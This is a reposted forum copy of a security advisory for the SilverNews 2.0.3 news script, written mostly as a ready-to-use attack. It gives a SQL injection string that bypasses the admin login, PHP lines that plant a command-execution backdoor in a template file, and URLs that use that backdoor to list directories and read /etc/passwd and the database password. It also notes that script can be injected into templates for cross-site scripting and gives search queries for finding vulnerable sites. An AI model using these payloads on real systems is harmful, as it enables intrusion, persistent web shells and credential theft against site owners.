[转载]Silvernews 2.0.3(预览版也可能存在)SQL Injection漏洞及测试方法
文章作者:retrogod [at] aliceposta.itsoftware:
author site: [url]http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews[/url]
SQL Injection / Login bypass:
A user can bypass admin password check, if magic_quotes is set to off:
user: ' or isnull(1/0) /*
pass: whatever
remote commands execution:
now, new admin can edit template, clicking on Templates -> Global footer, can
add the lines:
//***********************************************
</body>
</html>
TEMPLATE;
}
}
system($HTTP_GET_VARS[command]);
/*
to leave a backdoor in template file /templates/tpl_global.php
now can launch system commands on the target system with theese urls:
http://[target]/[path]//templates/tpl_global.php?command=ls%20-la
to list directories
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd
to see /etc/passwd file
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php
to see Mysql database password (look inside html...)
cross site scripting:
same way, a user can hide evil javascript code in template
googledork: "Powered by SilverNews"
or: intitle:"SilverNews 2.0 Admin control panel"
页:
[1]